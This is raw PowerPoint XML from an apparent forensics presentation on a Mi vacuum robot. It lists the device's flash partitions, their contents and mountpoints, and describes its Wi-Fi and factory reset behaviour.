        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="673735" y="1762573"/>
          <a:ext cx="9375700" cy="4172065"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1130404">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4787592">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1728852">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1728852">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675728171"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="405628">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>Label</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>Content</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>Mountpoint</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Format</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
                        <a:t>boot-res</a:t>
                      </a:r>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bitmaps &amp; some wav files</a:t>
                      </a:r>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Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1" dirty="0"/>
                        <a:t>env</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1"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err="1"/>
                        <a:t>uboot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> line</a:t>
                      </a:r>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Text</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1"/>
                        <a:t>app</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>device.conf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> (DID, key, MAC), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>adb.conf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>vinda</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>mnt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>default</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1"/>
                        <a:t>recovery</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1"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sz="1400" dirty="0" err="1"/>
                        <a:t>fallback</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>copy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> OS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1"/>
                        <a:t>system_a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>copy of OS (active by</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
                        <a:t> default</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1"/>
                        <a:t>system_b</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>copy of OS (passive by</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
                        <a:t> default</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1"/>
                        <a:t>Download</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>temporary</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>unpacked</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> OS update</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>mnt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/Download</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1"/>
                        <a:t>reserve</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1"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sz="1400" dirty="0" err="1"/>
                        <a:t>config</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>calibration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>files</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>blackbox.db</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>mnt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>reserve</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>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t>Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" b="1" dirty="0"/>
                        <a:t>UDISK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>logs, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>maps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>, Wi-Fi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>config</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>userID</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="1" indent="0">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>mnt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                        <a:t>data</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1"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t>Ext4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D358396D-843B-441F-96E3-AE4FC1617B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471338" y="5463365"/>
            <a:ext cx="9578097" cy="567036"/>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FEF4EE66-59EC-4110-B6FD-3DBDA5111796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10113570" y="5423717"/>
            <a:ext cx="2185938" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We are interested</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in this for forensics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDAC2D53-93DB-1840-ADA2-6D9C188F7B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDA686D-0C19-ED44-9D05-F8F5F43A01C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10006062" y="4039081"/>
            <a:ext cx="2185938" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19401188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C0F55-9F2B-4F0E-A8A4-112859D00DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="180082"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mi Vacuum Robot reset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD0CFB9-1DDB-4669-B970-A602B91EF39B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484915" y="1830389"/>
            <a:ext cx="10972800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Devices support Wi-Fi reset and factory reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wi-Fi reset: file with Wi-Fi credentials is deleted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Factory reset:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requires special procedure described in the manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS partitions are restored from recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
